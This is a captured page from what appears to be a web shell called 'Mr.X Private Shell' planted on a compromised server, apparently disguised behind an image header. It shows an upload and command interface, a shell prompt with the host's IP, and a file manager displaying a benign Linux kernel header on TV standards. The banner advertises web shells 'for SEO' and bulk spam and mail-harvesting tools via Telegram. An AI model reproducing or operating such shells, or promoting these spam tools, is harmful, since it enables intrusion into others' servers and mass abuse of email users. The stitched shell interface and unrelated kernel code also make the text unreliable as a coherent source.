����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

deexcl@216.73.217.71: ~ $
/* SPDX-License-Identifier: GPL-2.0-only or X11 */
/*
 * Copyright 2019 Pengutronix, Marco Felsch <kernel@pengutronix.de>
 */

#ifndef _DT_BINDINGS_DISPLAY_SDTV_STDS_H
#define _DT_BINDINGS_DISPLAY_SDTV_STDS_H

/*
 * Attention: Keep the SDTV_STD_* bit definitions in sync with
 * include/uapi/linux/videodev2.h V4L2_STD_* bit definitions.
 */
/* One bit for each standard */
#define SDTV_STD_PAL_B		0x00000001
#define SDTV_STD_PAL_B1		0x00000002
#define SDTV_STD_PAL_G		0x00000004
#define SDTV_STD_PAL_H		0x00000008
#define SDTV_STD_PAL_I		0x00000010
#define SDTV_STD_PAL_D		0x00000020
#define SDTV_STD_PAL_D1		0x00000040
#define SDTV_STD_PAL_K		0x00000080

#define SDTV_STD_PAL		(SDTV_STD_PAL_B		| \
				 SDTV_STD_PAL_B1	| \
				 SDTV_STD_PAL_G		| \
				 SDTV_STD_PAL_H		| \
				 SDTV_STD_PAL_I		| \
				 SDTV_STD_PAL_D		| \
				 SDTV_STD_PAL_D1	| \
				 SDTV_STD_PAL_K)

#define SDTV_STD_PAL_M		0x00000100
#define SDTV_STD_PAL_N		0x00000200
#define SDTV_STD_PAL_Nc		0x00000400
#define SDTV_STD_PAL_60		0x00000800

#define SDTV_STD_NTSC_M		0x00001000	/* BTSC */
#define SDTV_STD_NTSC_M_JP	0x00002000	/* EIA-J */
#define SDTV_STD_NTSC_443	0x00004000
#define SDTV_STD_NTSC_M_KR	0x00008000	/* FM A2 */

#define SDTV_STD_NTSC		(SDTV_STD_NTSC_M	| \
				 SDTV_STD_NTSC_M_JP	| \
				 SDTV_STD_NTSC_M_KR)

#define SDTV_STD_SECAM_B	0x00010000
#define SDTV_STD_SECAM_D	0x00020000
#define SDTV_STD_SECAM_G	0x00040000
#define SDTV_STD_SECAM_H	0x00080000
#define SDTV_STD_SECAM_K	0x00100000
#define SDTV_STD_SECAM_K1	0x00200000
#define SDTV_STD_SECAM_L	0x00400000
#define SDTV_STD_SECAM_LC	0x00800000

#define SDTV_STD_SECAM		(SDTV_STD_SECAM_B	| \
				 SDTV_STD_SECAM_D	| \
				 SDTV_STD_SECAM_G	| \
				 SDTV_STD_SECAM_H	| \
				 SDTV_STD_SECAM_K	| \
				 SDTV_STD_SECAM_K1	| \
				 SDTV_STD_SECAM_L	| \
				 SDTV_STD_SECAM_LC)

/* Standards for Countries with 60Hz Line frequency */
#define SDTV_STD_525_60		(SDTV_STD_PAL_M		| \
				 SDTV_STD_PAL_60	| \
				 SDTV_STD_NTSC		| \
				 SDTV_STD_NTSC_443)

/* Standards for Countries with 50Hz Line frequency */
#define SDTV_STD_625_50		(SDTV_STD_PAL		| \
				 SDTV_STD_PAL_N		| \
				 SDTV_STD_PAL_Nc	| \
				 SDTV_STD_SECAM)

#endif /* _DT_BINDINGS_DISPLAY_SDTV_STDS_H */

Filemanager

Name Type Size Permission Actions
sdtv-standards.h File 2.16 KB 0644
tda998x.h File 184 B 0644